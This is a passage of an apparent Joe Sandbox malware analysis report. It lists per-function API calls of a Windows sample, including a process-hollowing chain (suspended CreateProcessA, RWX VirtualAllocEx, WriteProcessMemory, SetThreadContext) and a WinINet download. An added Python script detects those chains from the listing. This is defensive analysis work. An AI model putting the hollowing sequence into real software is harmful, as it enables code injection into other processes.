• RegCloseKey.ADVAPI32(?), ref: 005D9F06
• RegCloseKey.KERNELBASE(?), ref: 005D9F10
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Close$OpenValue
• String ID:
• API String ID: 3951040859-0
                                                                                                                                                                                            • Opcode ID: d9ae0257e4cb1ed463b0cc5b858a790e3918f99fe9117e41aa8b3c87ff5bd6c1
                                                                                                                                                                                            • Instruction ID: 2700c171645360ac855a9467aee1d71974c9ea0bc57c8d8fcdc6efcc6774cc0e
                                                                                                                                                                                            • Opcode Fuzzy Hash: d9ae0257e4cb1ed463b0cc5b858a790e3918f99fe9117e41aa8b3c87ff5bd6c1
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE012830240205EFEF18CF14D889F663B6AFB44705F50895AF5168F2A1D7B2ED51CBA0

Control-flow Graph
control_flow_graph 1743 60ad21-60ad55 call 6042f4 call 5f93c7 1748 60ad57-60ad5a 1743->1748 1749 60ad5c-60ad71 call 60adaf 1743->1749 1750 60ad7b-60ad7f 1748->1750 1752 60ad76-60ad79 1749->1752 1753 60ad81-60ad89 call 5fce37 1750->1753 1754 60ad8a-60ad8e 1750->1754 1752->1750 1753->1754
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: _free
• String ID: f'`
• API String ID: 269201875-611106237
• Opcode ID: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
• Instruction ID: e10de683f00683c66f2b40ff100f43b0a774272d7684a508812009893d8ff5ce
• Opcode Fuzzy Hash: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
• Instruction Fuzzy Hash: 9F012C72C0025DAFCF42AFE88D019EF7FB6BF08350F144165BA25A21E1E6318A209B91

Control-flow Graph
control_flow_graph 1757 602727-60274d call 6024fd 1760 6027a6-6027a9 1757->1760 1761 60274f-602761 call 60ad8f 1757->1761 1763 602766-60276b 1761->1763 1763->1760 1764 60276d-6027a5 1763->1764
APIs
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: cfbf2b513e35c1d62e21ddf63b7baaafb57e60d0ea150dd91d9de4dac6bc91e1
• Instruction ID: 9ecc46a5f862eb346c37ca1d202689ef73d24e6697ad5ab84ffee3ecfc1137f3
• Opcode Fuzzy Hash: cfbf2b513e35c1d62e21ddf63b7baaafb57e60d0ea150dd91d9de4dac6bc91e1
• Instruction Fuzzy Hash: 95111575A0420AAFCF09DF58E945EDB7BF9EF88314F0440A9F809AB351D670EA11CB65

Control-flow Graph
control_flow_graph 1765 60aa68-60aa8c CreateFileW
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,0060AE58,?,?,00000000,?,0060AE58,00000000,0000000C), ref: 0060AA85
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 1931130c7c7fb08b824463673cc2d96ae0b415809730fc92d9f0884e1e327368
• Instruction ID: bf39a23acdd1e0f5d73bcf8fdb37cb4328571c7c9cf0776b64bbe71b375e5f23
• Opcode Fuzzy Hash: 1931130c7c7fb08b824463673cc2d96ae0b415809730fc92d9f0884e1e327368
• Instruction Fuzzy Hash: 6AD06C3204014DBBDF028F84DC06EDA3BAAFB48714F018010FE1856020C772E871AB90
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005F0788
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005F0796
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005F07A7
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005F07B8
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005F07C9
• GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005F07DA
• GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 005F07EB
• GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005F07FC
• GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 005F080D
• GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005F081E
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005F082F
• GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005F0840
• GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005F0851
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005F0862
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005F0873
• GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005F0884
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005F0895
• GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005F08A6
• GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 005F08B7
• GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 005F08C8
• GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 005F08D9
• GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 005F08EA
• GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 005F08FB
• GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 005F090C
• GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 005F091D
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 005F092E
• GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005F093F
• GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 005F0950
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005F0961
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005F0972
• GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 005F0983
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 005F0994
• GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 005F09A5
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 005F09B6
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 005F09C7
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 005F09D8
• GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 005F09E9
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 005F09FA
• GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 005F0A0B
• GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 005F0A1C
• GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 005F0A2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                            • API String ID: 667068680-295688737
                                                                                                                                                                                            • Opcode ID: d0951e696655437e66d960fcda008afbf135f7d6d862480ba3ce9e8aa38d5866
                                                                                                                                                                                            • Instruction ID: 52448f559a6761eaeed5811d977ee1eff36647b5e7192769e222bb16cca2ee89
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0951e696655437e66d960fcda008afbf135f7d6d862480ba3ce9e8aa38d5866
                                                                                                                                                                                            • Instruction Fuzzy Hash: F761BA71DD2720ABEB505FB4AE0D8873EEBEA2D701305291AB212D2161D7F6B491CF91
APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 005DA352
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 005DA36E
• CoUninitialize.OLE32 ref: 005DA378
• CoCreateInstance.OLE32(00610EB8,00000000,00000001,00610EC8,?), ref: 005DA3B0
• CoUninitialize.OLE32 ref: 005DA3BA
• SysAllocString.OLEAUT32(?), ref: 005DA476
• SysFreeString.OLEAUT32(00000000), ref: 005DA4A1
• CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005DA4C1
• CoUninitialize.OLE32 ref: 005DA4D4
• SysAllocString.OLEAUT32(?), ref: 005DA6E0
• SysAllocString.OLEAUT32(?), ref: 005DA7F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: String$AllocUninitialize$Initialize$BlanketCreateFreeInstanceProxySecurity
• String ID: dey68$r`A
• API String ID: 1334779090-1493988896
• Opcode ID: 988ffd54e2ba06b5fcbb81ea0bead3397458c45b1ee0157b58b0a5dbcb0ee0ff
• Instruction ID: 3a412e876dc92c190163873edf4a71409e8d6d451329b2bab4547b0722d3e729
• Opcode Fuzzy Hash: 988ffd54e2ba06b5fcbb81ea0bead3397458c45b1ee0157b58b0a5dbcb0ee0ff
• Instruction Fuzzy Hash: DB12E135A102199BDB15DBB8CC45BDEBB75BF99304F14875AF804B73A1EB31AA81CB40
APIs
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 005D480B
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D4826
• GetThreadContext.KERNEL32(?,00010002), ref: 005D487C
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 005D48A7
• GetModuleHandleA.KERNEL32(00000000), ref: 005D4934
• GetProcAddress.KERNEL32(00000000,00000000), ref: 005D4AF7
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 005D4B34
• GetLastError.KERNEL32 ref: 005D4B3D
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4B5D
• WriteProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 005D4B7F
• SetThreadContext.KERNEL32(?,00010002), ref: 005D4D4C
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005D4D6B
• VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 005D4D88
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005D4DCD
• VirtualProtectEx.KERNEL32(?,?,?,00000001,?), ref: 005D4E8A
• ResumeThread.KERNEL32(?), ref: 005D4EB0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ProcessVirtual$Memory$AllocThreadWrite$ContextProtect$AddressCreateErrorHandleLastModuleProcReadResume
• String ID: 1/(&I
• API String ID: 1965314979-1488106507
• Opcode ID: ff4b78778783c3fcab4816c396306e6b2bc40780154deab1c40677ea8bd28340
• Instruction ID: 01477185b5f9b7d94e300cc0709d9f7b62d25a5d3064553f3382b352ad1d8ebc
• Opcode Fuzzy Hash: ff4b78778783c3fcab4816c396306e6b2bc40780154deab1c40677ea8bd28340
• Instruction Fuzzy Hash: 67228E31E012199BEB25CFA9DC41BAEBBB5FF55304F14866BE805B7251E731AA81CF40
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,~`,00000002,00000000,?,?,?,00607EEB,?,00000000), ref: 00607C66
• GetLocaleInfoW.KERNEL32(?,20001004,~`,00000002,00000000,?,?,?,00607EEB,?,00000000), ref: 00607C8F
• GetACP.KERNEL32(?,?,00607EEB,?,00000000), ref: 00607CA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP$~`
• API String ID: 2299586839-3512132812
• Opcode ID: 419dd016f39911cbafce85b32e6c63e2d889d6bf70bea55c3155c1ae3619fbd5
• Instruction ID: e198e30fba0fc733208f318b7d72a237580b1807bfdb572fcea4ac02cfdc204a
• Opcode Fuzzy Hash: 419dd016f39911cbafce85b32e6c63e2d889d6bf70bea55c3155c1ae3619fbd5
• Instruction Fuzzy Hash: A621C432E88100AEFB3C8F54C904AD773A7EB54B55B5A8864E90AC7294E732FD41C350
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D5A8A
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 005D5CA2
• InternetCloseHandle.WININET(00000000), ref: 005D5CB6
• InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D5E9D
• InternetCloseHandle.WININET(?), ref: 005D605D
• InternetCloseHandle.WININET(?), ref: 005D6062
  • Part of subcall function 005D5610: ___std_exception_copy.LIBVCRUNTIME ref: 005D5638
  • Part of subcall function 005F1930: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000104,00000104,00000000,005EF478,00000104,0061CEB4,?,00000104,?,?), ref: 005F1990
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Internet$CloseHandle$Open$ExceptionFileRaiseRead___std_exception_copy
• String ID:
• API String ID: 4074124989-0
• Opcode ID: 99f8c3ee510295ba1685eab650f4e7991750df7ddfb2818aa7280d8a37ce9ffd
• Instruction ID: 0a130618e04a2afca6dde0cd6f58d7234dde70b496af1dec67ef56f0974385f3
• Opcode Fuzzy Hash: 99f8c3ee510295ba1685eab650f4e7991750df7ddfb2818aa7280d8a37ce9ffd
• Instruction Fuzzy Hash: C4422676D216558BEB12DB78C8457DDFBB4BF66340F14871BE800B7292FB3166828B40
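Two of the function records above carry the evidence behind the report's "Injects a PE file into a foreign processes" and "Modifies the context of a thread in another process" signatures: the function at ref 005D480B, whose call chain is CreateProcessA with dwCreationFlags 0x00000004 (CREATE_SUSPENDED), GetThreadContext, VirtualAllocEx with flProtect 0x00000040 (PAGE_EXECUTE_READWRITE), WriteProcessMemory, SetThreadContext and ResumeThread, and the function at ref 005D5A8A, which fetches a URL through WinINet with InternetOpenUrlA dwFlags 0x84000100 (INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE) and reads it in 0x400-byte chunks. The script below is an added example for this page, not Joe Sandbox code: it parses "APIs" bullet lines of the format used in this report and checks them for those two ordered chains, decoding the constants named above (documented Win32 values). The sample listings inside it are copied from the two records above; the stage names and rule structure are this example's own. Joe Sandbox prints "?" for argument values it could not resolve statically, and the bullets follow call-site order in the function, not a recorded execution trace, so a complete chain is evidence of capability rather than proof that every call ran. The COM record at ref 005DA352 (CoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket with RPC_C_AUTHN_LEVEL_CALL and RPC_C_IMP_LEVEL_IMPERSONATE) could be walked the same way, but its CLSID and IID appear only as the pointers 00610EB8 and 00610EC8, so the listing alone does not identify the WMI class the report's signature names.

```python
"""Ordered-call checks over a Joe Sandbox "APIs" listing.
Added example for this report page, not Joe Sandbox code: it reads the bullet lines of an
"APIs" block as text and looks for the ordered call chains the report's signatures describe."""
import re
from dataclasses import dataclass

# One "APIs" bullet, with or without an argument list ("... ref: 005D480B" ends each one).
_CALL_RE = re.compile(r"(?P<func>\w+)\.(?P<module>[A-Za-z0-9.]+?)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
CREATE_SUSPENDED = 0x4          # CreateProcess dwCreationFlags, 6th argument
PAGE_EXECUTE_READWRITE = 0x40   # VirtualAllocEx flProtect, 5th argument
WININET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD",          # InternetOpenUrl dwFlags,
                 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",  # 5th argument
                 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}


@dataclass
class Call:
    func: str
    args: list
    ref: str
    subcall: bool   # "Part of subcall function ...": made by a callee, not this function

    def arg(self, i):
        """Argument i as an int; None when the report shows '?', a string, or nothing."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None


def parse_calls(listing):
    calls = []
    for line in listing.splitlines():
        m = _CALL_RE.search(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            calls.append(Call(m.group("func"), args, m.group("ref").upper(),
                              "Part of subcall" in line))
    return calls


def match_sequence(calls, stages):
    """Refs of the calls meeting each stage in listing order, or None if the chain is incomplete.
    Subcall entries are skipped so a chain is not stitched together from unrelated callees."""
    refs, i = [], 0
    for c in calls:
        if not c.subcall and stages[i][1](c):
            refs.append(c.ref)
            i += 1
            if i == len(stages):
                return refs
    return None


def _named(*names):
    return lambda c: c.func in names


# Process hollowing: suspended child, thread context read, RWX region allocated and
# written in the child, thread context redirected, thread resumed.
HOLLOWING = [
    ("suspended child", lambda c: c.func in ("CreateProcessA", "CreateProcessW")
                                  and bool((c.arg(5) or 0) & CREATE_SUSPENDED)),
    ("read thread context", _named("GetThreadContext")),
    ("RWX region in child", lambda c: c.func == "VirtualAllocEx"
                                      and c.arg(4) == PAGE_EXECUTE_READWRITE),
    ("write into child", _named("WriteProcessMemory")),
    ("redirect thread", _named("SetThreadContext")),
    ("resume", _named("ResumeThread")),
]
DOWNLOAD = [   # WinINet fetch: session handle, URL handle, body read
    ("open session", _named("InternetOpenA", "InternetOpenW")),
    ("open URL", _named("InternetOpenUrlA", "InternetOpenUrlW")),
    ("read body", _named("InternetReadFile")),
]


def decode_flags(value, table):
    """Names of the known bits set in value, and the bits the table does not cover."""
    return [n for bit, n in table.items() if value & bit], value & ~sum(table)


def url_flags(calls):
    """Decoded dwFlags of the first InternetOpenUrl call whose value the report shows."""
    for c in calls:
        if c.func in ("InternetOpenUrlA", "InternetOpenUrlW") and c.arg(4) is not None:
            return decode_flags(c.arg(4), WININET_FLAGS)
    return None


# Sample input copied from this report's "APIs" blocks at ref 005D480B (abridged) and 005D5A8A.
HOLLOWING_LISTING = """
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 005D480B
• GetThreadContext.KERNEL32(?,00010002), ref: 005D487C
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 005D4B34
• GetLastError.KERNEL32 ref: 005D4B3D
• WriteProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 005D4B7F
• SetThreadContext.KERNEL32(?,00010002), ref: 005D4D4C
• ResumeThread.KERNEL32(?), ref: 005D4EB0
"""
DOWNLOAD_LISTING = """
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D5A8A
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 005D5CA2
• InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D5E9D
  • Part of subcall function 005D5610: ___std_exception_copy.LIBVCRUNTIME ref: 005D5638
"""
```

Run `match_sequence(parse_calls(HOLLOWING_LISTING), HOLLOWING)` to get the six ref addresses of the hollowing chain, and `url_flags(parse_calls(DOWNLOAD_LISTING))` to see 0x84000100 decoded with no leftover bits. The rules deliberately key on the decoded constants rather than on function names alone: CreateProcess without CREATE_SUSPENDED, or VirtualAllocEx without PAGE_EXECUTE_READWRITE, is how a legitimate launcher or debugger looks, and the stage that fails tells the analyst which piece of evidence is missing.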
APIs
  • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
  • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
  • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCAF2
  • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCB28
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00607EAE
• IsValidCodePage.KERNEL32(00000000), ref: 00607EF7
• IsValidLocale.KERNEL32(?,00000001), ref: 00607F06
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00607F4E
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00607F6D
Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 949163717-0
                                                                                                                                                                                            • Opcode ID: e3848f9ac8edccbb8c4ff648265b1c2b37106ca31574752e707f4fa290268c2d
                                                                                                                                                                                            • Instruction ID: 0ddf8dbbd393436ec4970527767d24f124c8aea0737adc3fe2a605b3e32a6692
                                                                                                                                                                                            • Opcode Fuzzy Hash: e3848f9ac8edccbb8c4ff648265b1c2b37106ca31574752e707f4fa290268c2d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B517071E4520AABDB14DFA5DC45AFB77BABF08700F1448A9A510E72D0E770AD418B61
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,`$fSEQXVuIP\Z2A$fSEQXVuIP\Z2A$qD^N\i^NT_SzA
                                                                                                                                                                                            • API String ID: 0-606821963
                                                                                                                                                                                            • Opcode ID: 155e98ff5c40fb49d328f13856e6c317f078362def765c14258667d8b10518e3
                                                                                                                                                                                            • Instruction ID: b77ce1b5cc414c20b16adaf9424b4c01b504093149e292388f9322a9288d48b4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 155e98ff5c40fb49d328f13856e6c317f078362def765c14258667d8b10518e3
                                                                                                                                                                                            • Instruction Fuzzy Hash: EED23735D212598AEB06DB78C8467DDF775BFAA344F14C71BE801B6662FB31A6C28700
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005F1440
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 005F150C
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005F152C
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 005F1536
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
